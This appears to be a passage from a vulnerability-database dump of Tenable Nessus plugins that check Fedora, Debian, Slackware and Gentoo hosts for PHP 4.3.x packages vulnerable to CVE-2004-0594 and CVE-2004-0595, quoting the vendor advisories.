port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^4\\.3\\.[0-7]($|[^0-9])\")\n{\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.3.8\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:55", "bulletinFamily": "scanner", "description": "This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the ", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2004-222.NASL", "href": "https://www.tenable.com/plugins/nessus/13748", "published": "2004-07-24T00:00:00", "title": "Fedora Core 1 : php-4.3.8-1.1 (2004-222)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-222.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13748);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-222\");\n\n script_name(english:\"Fedora Core 1 : php-4.3.8-1.1 (2004-222)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the 'register_globals' setting has been enabled.\nCVE-2004-0595 can allow a possible cross-site-scripting attack with\nsome browsers.\n\nThe mbstring extension has been moved into the php-mbstring subpackage\nin this update to reduce the overall package size.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-July/000228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0288a8dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"php-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-debuginfo-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-devel-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-domxml-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-imap-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-ldap-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-mbstring-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-mysql-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-odbc-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-pgsql-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-snmp-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-xmlrpc-4.3.8-1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:55", "bulletinFamily": "scanner", "description": "This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the ", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2004-223.NASL", "href": "https://www.tenable.com/plugins/nessus/13749", "published": "2004-07-24T00:00:00", "title": "Fedora Core 2 : php-4.3.8-2.1 (2004-223)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-223.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13749);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-223\");\n\n script_name(english:\"Fedora Core 2 : php-4.3.8-2.1 (2004-223)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the 'register_globals' setting has been enabled.\nCVE-2004-0595 can allow a possible cross-site-scripting attack with\nsome browsers.\n\nThe mbstring extension has been moved into the php-mbstring subpackage\nin this update to reduce the overall package size.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-July/000229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfe80132\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"php-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-debuginfo-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-devel-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-domxml-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-imap-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-ldap-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-mbstring-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-mysql-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-odbc-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-pear-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-pgsql-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-snmp-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-xmlrpc-4.3.8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:00:58", "bulletinFamily": "scanner", "description": "Two vulnerabilities were discovered in php4 :\n\n - CAN-2004-0594\n The memory_limit functionality in PHP 4.x up to 4.3.7,\n and 5.x up to 5.0.0RC3, under certain conditions such as\n when register_globals is enabled, allows remote\n attackers to execute arbitrary code by triggering a\n memory_limit abort during execution of the\n zend_hash_init function and overwriting a HashTable\n destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595\n\n The strip_tags function in PHP 4.x up to 4.3.7, and 5.x\n up to 5.0.0RC3, does not filter null (\\0) characters\n within tag names when restricting input to allowed tags,\n which allows dangerous tags to be processed by web\n browsers such as Internet Explorer and Safari, which\n ignore null characters and facilitate the exploitation\n of cross-site scripting (XSS) vulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-531.NASL", "href": "https://www.tenable.com/plugins/nessus/15368", "published": "2004-09-29T00:00:00", "title": "Debian DSA-531-1 : php4 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-531. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15368);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/08/02 13:32:18\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"DSA\", value:\"531\");\n\n script_name(english:\"Debian DSA-531-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities were discovered in php4 :\n\n - CAN-2004-0594\n The memory_limit functionality in PHP 4.x up to 4.3.7,\n and 5.x up to 5.0.0RC3, under certain conditions such as\n when register_globals is enabled, allows remote\n attackers to execute arbitrary code by triggering a\n memory_limit abort during execution of the\n zend_hash_init function and overwriting a HashTable\n destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595\n\n The strip_tags function in PHP 4.x up to 4.3.7, and 5.x\n up to 5.0.0RC3, does not filter null (\\0) characters\n within tag names when restricting input to allowed tags,\n which allows dangerous tags to be processed by web\n browsers such as Internet Explorer and Safari, which\n ignore null characters and facilitate the exploitation\n of cross-site scripting (XSS) vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-531\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the current stable distribution (woody), these problems have been\nfixed in version 4.1.2-7.\n\nWe recommend that you update your php4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"caudium-php4\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-cgi\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-curl\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-dev\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-domxml\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-gd\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-imap\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-ldap\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mcal\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mhash\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mysql\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-odbc\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-pear\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-recode\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-snmp\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-sybase\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-xslt\", reference:\"4.1.2-7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:33:50", "bulletinFamily": "scanner", "description": "New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and\n-current to fix security issues (memory_limit handling and a problem\nin the strip_tags function). Sites using PHP should upgrade.", "modified": "2019-12-02T00:00:00", "id": "SLACKWARE_SSA_2004-202-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18773", "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : PHP (SSA:2004-202-01)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-202-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18773);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/25 13:36:20\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"SSA\", value:\"2004-202-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : PHP (SSA:2004-202-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and\n-current to fix security issues (memory_limit handling and a problem\nin the strip_tags function). Sites using PHP should upgrade.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?011c10ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:33:14", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200407-13\n(PHP: Multiple security vulnerabilities)\n\n Several security vulnerabilities were found and fixed in version 4.3.8 of\n PHP. The strip_tags() function, used to sanitize user input, could in\n certain cases allow tags containing \\\\0 characters (CAN-2004-0595). When\n memory_limit is used, PHP might unsafely interrupt other functions\n (CAN-2004-0594). The ftok and itpc functions were missing safe_mode checks.\n It was possible to bypass open_basedir restrictions using MySQL", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-200407-13.NASL", "href": "https://www.tenable.com/plugins/nessus/14546", "published": "2004-08-30T00:00:00", "title": "GLSA-200407-13 : PHP: Multiple security vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14546);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:41\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"GLSA\", value:\"200407-13\");\n\n script_name(english:\"GLSA-200407-13 : PHP: Multiple security vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-13\n(PHP: Multiple security vulnerabilities)\n\n Several security vulnerabilities were found and fixed in version 4.3.8 of\n PHP. The strip_tags() function, used to sanitize user input, could in\n certain cases allow tags containing \\\\0 characters (CAN-2004-0595). When\n memory_limit is used, PHP might unsafely interrupt other functions\n (CAN-2004-0594). The ftok and itpc functions were missing safe_mode checks.\n It was possible to bypass open_basedir restrictions using MySQL's LOAD DATA\n LOCAL function. Furthermore, the IMAP extension was incorrectly allocating\n memory and alloca() calls were replaced with emalloc() for better stack\n protection.\n \nImpact :\n\n Successfully exploited, the memory_limit problem could allow remote\n execution of arbitrary code. By exploiting the strip_tags vulnerability, it\n is possible to pass HTML code that would be considered as valid tags by the\n Microsoft Internet Explorer and Safari browsers. Using ftok, itpc or\n MySQL's LOAD DATA LOCAL, it is possible to bypass PHP configuration\n restrictions.\n \nWorkaround :\n\n There is no known workaround that would solve all these problems. All users\n are encouraged to upgrade to the latest available versions.\"\n );\n # http://security.e-matters.de/advisories/112004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83c215d0\"\n );\n # http://security.e-matters.de/advisories/122004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d4bce03\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP, mod_php and php-cgi users should upgrade to the latest stable\n version:\n # emerge sync\n # emerge -pv '>=dev-php/php-4.3.8'\n # emerge 